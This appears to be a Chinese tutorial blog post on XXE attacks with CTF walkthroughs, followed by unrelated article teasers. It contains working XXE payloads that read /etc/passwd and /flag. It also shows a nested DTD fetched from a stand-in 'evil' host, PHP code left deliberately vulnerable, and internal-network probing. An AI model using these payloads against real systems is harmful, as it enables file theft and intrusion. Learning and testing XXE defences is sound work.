一篇文章带你入门XXE

1.什么是XXE?

   XML External Entity(XXE)攻击是一种利用 XML 处理器的漏洞,通过引入恶意的外部实体来攻击应用程序的安全性。这种攻击通常发生在对用户提供的 XML 数据进行解析时,攻击者利用了 XML 规范允许引用外部实体的特性。

   在XXE攻击中,攻击者通常会构造带有恶意实体引用的 XML 数据,然后提交给应用程序进行解析。这些恶意实体引用可以指向本地文件系统中的文件、远程服务器上的资源,甚至是网络服务,从而导致应用程序执行不安全的操作,比如读取敏感文件、执行任意代码等。

  用一句话总结就是:

XXE攻击利用XML解析器的漏洞,通过在XML数据中注入恶意实体,使服务器解析时返回敏感信息或执行攻击者指定的操作。

2.如何利用XXE?

   当应用程序对 XML 数据执行解析时,如果未正确配置和处理外部实体引用,就可能存在 XML 实体注入(XXE)漏洞。这种漏洞可以被恶意攻击者利用来执行各种攻击,包括读取敏感文件、执行远程请求等。

    下面是一个简单的例子来说明 XXE 漏洞:

     假设有一个简单的 XML 文件 example.xml,内容如下:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example [<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><content>&xxe;</content>
</root>

    在这个例子中,定义了一个叫做xxe的外部实体,它使用 SYSTEM 声明引用了一个本地文件 /etc/passwd。然后在 XML 内容中,我们引用了这个外部实体来填充 <content> 元素。

    假设应用程序在接收到这个 XML 文件时,未对外部实体进行适当的限制和过滤,那么在解析这个 XML 文件时就会触发 XXE 漏洞。攻击者可以通过构造包含恶意实体引用的 XML 数据,来读取或者执行系统中的敏感文件,比如 /etc/passw。

3.XML文档

● XML文档必须有根元素
● XML文档必须有关闭标签
● XML标签对大小写敏感
● XML元素必须被正确的嵌套
● XML属性必须加引号

也就是必须满足上面的格式xml文档的内容才会被识别和解析,那么必定会有一个评判的标准,那也就是DTD(document type definition)自动校准,可以是一个独立的文件,也可以在xml文件里面去声明。

DTD(内部的引用):

< !DOCTYPE TranInfo[
<! ELEMENT TranInfo(CdtrInf, DbtrInf,Amt)>
<! ELEMENT CdtrInf(Id,Nm)>
<! ELEMENT DbtrInf(Id, Nm)>

]>

XML文件:

<? xml version="1.0" encoding="UTF-8"?>
<TranInfo>
<CdtrInf>
<Id>6226097558881666</Id>
</CdtrInf>
<Nm>小白</Nm>
<DbtrInf>
<Id>6222083803003983</Id>
<Nm>小黑</Nm>
</DbtrInf>
<Amt>1000</Amt>
</TranInfo>

有没有发现上面的DTD与下面的XML一一对应的。

外部的引用:

<? xml version="1.0" encoding="UTF-8"?>
<! DOCTYPE name[
!ELEMENT name ANY >
!ENTITY xxe SYSTEM "file:///D:/test/test.dtd" >

]>

<people>
<name>xiaohei</name>
<area>&xxe ;< /area>
</ people>

从这里就会涉及一个外部实体的引用。

外部实体引用协议

常见的使用方式:

1.file:///etc/passwd

2.php://filter/read=convert.base64-encode/resource=index.php

3.http:/www.baidu.com/evil.dtd

4.graphql://api.example.com/graphql

总之:一般完整的XML文件内容:

<!-- 第一部分:XML声明部分 -- >
<? xml version="1.0"?>

<!-- 第二部分:文档类型定义 DTD -- >
<! DOCTYPE note[
<!-- 外部实体声明 -- >
! ENTITY entity-name SYSTEM "URI/URL">
1>

<!-- 第三部分:文档元素 -- >
<note>
<to>Dave</to>
<from>GiGi</from>
<head>Reminder</head>
<body>fish together</body>
</note>

4.漏洞演示

我们已经知道了XML文档一般长什么样,其实最重要的就是外部实体的引用:file:///D:/test/test.dtd

这里面可能会是一个http请求,很可能会导致漏洞出现。

常见的危害就是任意文件读取,系统命令执行,内网端口探测等

其实还有一个漏洞XXE注入比较苟:

层层嵌套

那就是我在外部引用DTD没啥问题,但是这个DTD在里面又进行了一次外部实体引用

根据SinHub大佬的说法:

xxe.xml

<? xml version="1.0"?>
<! DOCTYPE a SYSTEM "http://evil3z7.com/evil.dtd">
<c>&b ;< /c>

evil.dtd

<! ENTITY b SYSTEM "file:///etc/passwd">

上面进行了双重引用\

实战演练:

<?php

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);    

这里就直接bp抓包给一手:

<?xml version="1.0"?>
<!DOCTYPE payload [
<!ELEMENT payload ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<creds>
<ctfshow>&xxe;</ctfshow>
</creds>
直接拿下。

这里还有一道特别精彩的题目:来自https://www.cnblogs.com/upfine/p/16570120.html

首先:出现一个界面

二话不说直接抓包给一手:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user><username>&file;</username><password>1</password>
</user>

发现没有用,那就换成其他命令:

包含:/etc/hosts、/proc/net/arp、proc/net/fib_trie等,最终在proc/net/fib_trie发现一个新的ip:10.244.80.202,结果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:etc/hosts">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "http://10.244.80.202/">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>

发现链接不上,接下来那就尝试同网段下面的不同地址。

爆破一手

直接拿下。

希望文章能够帮助到大家,谢谢!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/23510.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

kafka-集群搭建(在docker中搭建)

文章目录 1、kafka集群搭建1.1、下载镜像文件1.2、创建zookeeper容器并运行1.3、创建3个kafka容器并运行1.3.1、9095端口1.3.2、9096端口1.3.3、9097端口 1.4、重启kafka-eagle1.5、查看 efak1.5.1、查看 brokers1.5.2、查看 zookeeper 1、kafka集群搭建 1.1、下载镜像文件 d…

实时监控电脑屏幕软件有哪些?(珍藏篇)

在当今的数字化工作环境中&#xff0c;实时监控电脑屏幕软件是企业管理、远程协助、教育监控等领域不可或缺的工具。 这些软件能够帮助管理者了解员工的工作状态、提升团队协作效率、确保数据安全&#xff0c;同时在家庭教育和远程技术支持中也有广泛应用。 以下是精选的几款实…

创意SQL,高考祝福!一起为学子们加油助威!

&#x1f4e2;&#x1f4e2;&#x1f4e2;&#x1f4e3;&#x1f4e3;&#x1f4e3; 作者&#xff1a;IT邦德 中国DBA联盟(ACDU)成员&#xff0c;10余年DBA工作经验&#xff0c; Oracle、PostgreSQL ACE CSDN博客专家及B站知名UP主&#xff0c;全网粉丝10万 擅长主流Oracle、My…

X-Caps

用于对视觉属性进行编码的胶囊 补充信息 数据集太大&#xff0c;不建议复现

【西瓜书】4.决策树

1 递归返回情况 &#xff08;1&#xff09;结点包含样本全为同一类别 &#xff08;2&#xff09;属性集为空&#xff0c;没有属性可供划分了 或 有属性&#xff0c;但是在属性上划分的结果都一样 &#xff08;3&#xff09;结点为空结点 **结束时判定该结点的类别遵循如下规则&…

『哈哥赠书 - 54期』-『架构思维:从程序员到CTO』

文章目录 ⭐️ 架构思维&#xff1a;从程序员到CTO⭐️ 本书简介⭐️ 作者简介⭐️ 编辑推荐⭐️ 不想成为架构师的程序员不是好CTO 在程序员的职业规划中&#xff0c;成为软件架构师是一个非常有吸引力的选择。但是对于如何才能成为一名架构师&#xff0c;不少同学认为只要代码…

uniadmin引入iconfont报错

当在uniadmin中引入iconfont后&#xff0c;出现错误&#xff1a; [plugin:vite:css] [postcss] Cannot find module ‘E:/UniAdmin/uniAdmin/static/fonts/iconfont.woff2?t1673083050786’ from ‘E:\UniAdmin\uniAdmin\static\fonts\iconfont.css’ 这是需要更改为绝对路径…

王炸级产品:字节跳动的Seed-TTS

在人工智能的快速发展中&#xff0c;文本到语音&#xff08;TTS&#xff09;技术已成为连接数字世界与人类沟通的重要桥梁。而字节跳动推出的Seed-TTS模型&#xff0c;无疑是这一领域的一个突破性进展&#xff0c;它以其卓越的性能和高度的自然度&#xff0c;被誉为TTS模型中的…

如何快速分析并将一个简单的前后端分离项目跑起来

一、前言 主要是前一段时间有小伙伴问我说自己刚入坑学后端不久&#xff0c;在开源网站上找了个简单的前后端分离项目&#xff0c;但是自己不会跑起来&#xff0c;让我给他说说&#xff0c;介于这玩意三两句话不是很好说清楚&#xff0c;而且不清楚那个小伙伴的知识到何种地步…

规则引擎LiteFlow发布v2.12.1版本,决策路由特性

个人博客&#xff1a;无奈何杨&#xff08;wnhyang&#xff09; 个人语雀&#xff1a;wnhyang 共享语雀&#xff1a;在线知识共享 Github&#xff1a;wnhyang - Overview 简介 标题其实是不准确的&#xff0c;了解过的会知道在LiteFlow的2.12.0已经有了决策路由的特性&…

每一个企业,都值得拥有自己专属的AI大模型!

前言 在数字化浪潮席卷全球的今天&#xff0c;人工智能&#xff08;AI&#xff09;已不再是遥不可及的科幻概念&#xff0c;而是成为了企业创新、转型、升级的必备工具。尤其是AI大模型&#xff0c;凭借其强大的数据处理能力和深度学习能力&#xff0c;正在为企业带来前所未有…

Leetcode:四数之和

题目链接&#xff1a;18. 四数之和 - 力扣&#xff08;LeetCode&#xff09; 普通版本&#xff08;排序 双指针&#xff09; 主旨&#xff1a;类似于三数之和的解法&#xff0c;但需要多加一些限制&#xff0c;同时为了防止多个数组元素的相加之和出现整型溢出问题还要将整型…

数据分析每周挑战——心衰患者特征数据集

这是一篇关于医学数据的数据分析&#xff0c;但是这个数据集数据不是很多。 背景描述 本数据集包含了多个与心力衰竭相关的特征&#xff0c;用于分析和预测患者心力衰竭发作的风险。数据集涵盖了从40岁到95岁不等年龄的患者群体&#xff0c;提供了广泛的生理和生活方式指标&a…

IO进程线程(九)线程的同步 进程间通信

文章目录 一、 线程的同步&#xff08;一&#xff09;无名信号量sem1. 定义和初始化2.获取信号量3.释放信号量4. 销毁5. 使用示例 &#xff08;二&#xff09;条件变量1. 定义和初始化2. 获取条件变量3. 释放条件变量4. 销毁条件变量 二、进程间通信&#xff08;一&#xff09;…

web-上传项目文件夹到Git远程仓库

Git初识 概念&#xff1a;一个免费开源&#xff0c;分布式的代码版本控制系统&#xff0c;帮助开发团队维护代码 作用&#xff1a;记录代码内容&#xff0c;切换代码版本&#xff0c;多人开发时高效合并代码内容 检验成功 打开bash终端&#xff08;git专用&#xff09;命令…

12. MySQL 日志

文章目录 【 1. 日志的基本原理 】【 2. 错误日志 Error Log 】2.1 启动和设置错误日志2.2 查看错误日志2.3 删除错误日志 【 3. 二进制日志 Binary Log 】3.1 启动和设置二进制日志3.2 查看二进制日志3.3 删除二进制文件删除所有二进制日志删除小于指定编号的二进制日志删除创…

【vue3+pinia+uniapp项目问题:使用pinia状态管理时store的数据更新,模板渲染视图不能实时更新】

在这里选择不同的学校后&#xff0c;发现store里面的数据打印出来能更新&#xff0c;但是使用store的数据打印出来并未实时更新且渲染在模板上&#xff0c;必须手动刷新视图才能更新。 原因是因为使用了解构赋值传入参数 解决方法 1.使用computed 现在视图能进行实时更新…

分享一个 .Net core Console 项目使用 SqlSugar 的详细例子

前言 SqlSugar 是一款老牌的 .NET 开源 ORM 框架&#xff0c;性能高&#xff0c;功能全面&#xff0c;使用简单&#xff0c;支持 .NET FrameWork、.NET Core3.1、.NET5、.NET6、.NET7、.NET8、.NET9 等版本&#xff0c;线上论坛非常活跃&#xff0c;今天给大伙分享一个 .Net c…

查看远程桌面端口,查看服务器的远程桌面端口的方法

如果你正在寻找一种方法来检查服务器的远程桌面端口&#xff0c;那么请务必按照以下步骤操作&#xff0c;以确保准确且安全地获取所需信息。这不仅是一个技术问题&#xff0c;更是一个关于效率和安全性的重要议题。 首先&#xff0c;你需要明确&#xff0c;远程桌面端口通常是…

【数据结构与算法 | 二叉树篇】二叉树的前中后序遍历(迭代版本)

1. 前言 前文我们实现了二叉树前中后三种遍历方式的递归版本&#xff0c;非常简单. 接下来我们来实现一下其迭代版本. 2. 二叉树的前序遍历 (1). 题 给你二叉树的根节点 root &#xff0c;返回它节点值的 前序 遍历。 示例 1&#xff1a; 输入&#xff1a;root [1,null,2…